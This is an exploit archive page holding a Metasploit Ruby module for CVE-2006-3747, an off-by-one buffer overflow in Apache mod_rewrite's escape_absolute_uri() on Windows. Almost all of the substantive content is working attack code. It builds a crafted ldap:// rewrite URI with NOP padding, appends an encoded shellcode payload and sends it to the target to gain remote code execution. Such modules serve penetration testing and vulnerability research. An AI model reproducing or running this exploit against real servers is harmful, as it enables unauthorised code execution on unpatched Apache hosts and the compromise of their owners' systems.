apache-mod-rewrite.rb.txt

apache-mod-rewrite.rb.txt: Posted Jan 7, 2008; Authored by Marcin Kozlowski; Apache mod_rewrite escape_absolute_uri() off-by-one buffer overflow Metasploit exploit module. This affects Apache versions 1.3.28 through 1.3.36, 2.0.46 through 2.0.58, and 2.2.1 through 2.2.2.; tags | exploit, overflow; advisories | CVE-2006-3747; SHA-256 | 503139768b0cda278959c2bc8df18f7cb0aee2077db8a28468990531d48c3000; Download | Favorite | View

apache-mod-rewrite.rb.txt

require 'msf/core'

module Msf

class Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow',
      'Description'    => %q{
        This module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria:
        *  beginning of the rewritten URL is controlled.
        *  flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag
      },
      'Author'         => [ 'Marcin Kozlowski' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 0001 $',
      'References'     =>
        [
          ['CVE', '2006-3747'],
          ['BID', '19204'],
          ['OSVDB', '27588'],

        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars'    => "\x00",
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        => 
        [
            ['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next 
        ],
      'DisclosureDate' => 'Aug 28 2006'))
      
      register_options(
        [
          OptString.new('REWRITEPATH', [true, "Rewrite path"]),
          Opt::RPORT(80) 
        ], self.class )
  end

  def exploit
    connect

    rewritepath = datastore['REWRITEPATH']


    uri = "/#{rewritepath}/ldap://"+rand_text_alphanumeric(rand(16))+"/"+rand_text_alphanumeric(rand(32))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(16))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f%90"  
    uri += payload.encoded
    
    
    res = "GET #{uri} HTTP/1.0\r\n\r\n"
    print_status("Trying ...")
    sock.put(res)
    sock.close
    
    handler
    disconnect
  end



end
end

Top Authors In Last 30 Days

Red Hat 200 files
Ubuntu 105 files
indoushka 31 files
Debian 23 files
CraCkEr 15 files
Gentoo 14 files
Google Security Research 12 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,758)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,866)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,370)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,652)
UNIX (9,246)
UnixWare (186)
Windows (6,557)
Other

apache-mod-rewrite.rb.txt

apache-mod-rewrite.rb.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

apache-mod-rewrite.rb.txt

Share This

apache-mod-rewrite.rb.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems